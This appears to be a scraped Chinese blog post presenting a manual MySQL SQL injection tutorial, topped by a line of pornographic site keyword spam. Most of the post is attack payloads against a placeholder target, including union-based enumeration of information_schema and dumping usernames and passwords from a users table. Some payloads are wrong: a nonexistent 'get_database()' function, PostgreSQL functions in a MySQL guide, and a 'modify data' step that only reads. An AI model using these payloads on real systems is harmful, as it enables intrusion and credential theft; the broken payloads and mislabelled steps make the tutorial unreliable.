欧美一区二区三区,国内熟女精品熟女A片视频小说,日本av网,小鲜肉男男GAY做受XXX网站

mysql 手工注入教程

張吉惟2年前9瀏覽0評論

MySQL是一款開放源代碼的關(guān)系型數(shù)據(jù)庫管理系統(tǒng),廣泛應(yīng)用于互聯(lián)網(wǎng),也是黑客注入網(wǎng)站的主要目標(biāo)之一。手工注入是一種常見的sql注入方式,下面介紹手工注入的教程。

1. 探測目標(biāo)網(wǎng)站的漏洞:使用工具或者直接手動測試來探測目標(biāo)網(wǎng)站是否存在漏洞,例如檢查URL中是否存在一些特殊字符

<a href="?id=1">id=1</a>
<a href="?id=1 and 1=2-1">id=1 and 1=2-1</a>
<a href="?id=1 and 1=2-2">id=1 and 1=2-2</a>

2. 使用注入點(diǎn):當(dāng)發(fā)現(xiàn)漏洞時,就可以使用注入點(diǎn)進(jìn)行注入攻擊,將SQL命令注入到目標(biāo)網(wǎng)站的SQL語句中。

http://target.com/index.php?id=1' union select 1,2,3-- -

3. 深入探測:獲取數(shù)據(jù)庫的詳細(xì)信息,例如當(dāng)前使用的數(shù)據(jù)庫、表的結(jié)構(gòu)和內(nèi)容等。

http://target.com/index.php?id=1' union select 1,2,get_database()-- -
http://target.com/index.php?id=1' union select 1,2,table_name from information_schema.tables where table_schema=database()-- -
http://target.com/index.php?id=1' union select 1,2,column_name from information_schema.columns where table_name='users'-- -
http://target.com/index.php?id=1' union select 1,username,password from users-- -

4. 注入攻擊:修改數(shù)據(jù)庫中的數(shù)據(jù)

http://target.com/index.php?id=1' and updatexml(1,concat(0x3a,version()),1)-- -
http://target.com/index.php?id=1' union select 1,"'||pg_database_size(pg_database_name())||",'test'-- -
http://target.com/index.php?id=1' union select 1,''||pg_database_size(pg_database_name())||''-- -
http://target.com/index.php?id=1' union select 1,''||pg_database_size(pg_database_name())||'','$'-- -

總結(jié),手工注入是一種有效的攻擊方式,但是使用時需要慎重,避免對被攻擊網(wǎng)站造成不必要的傷害。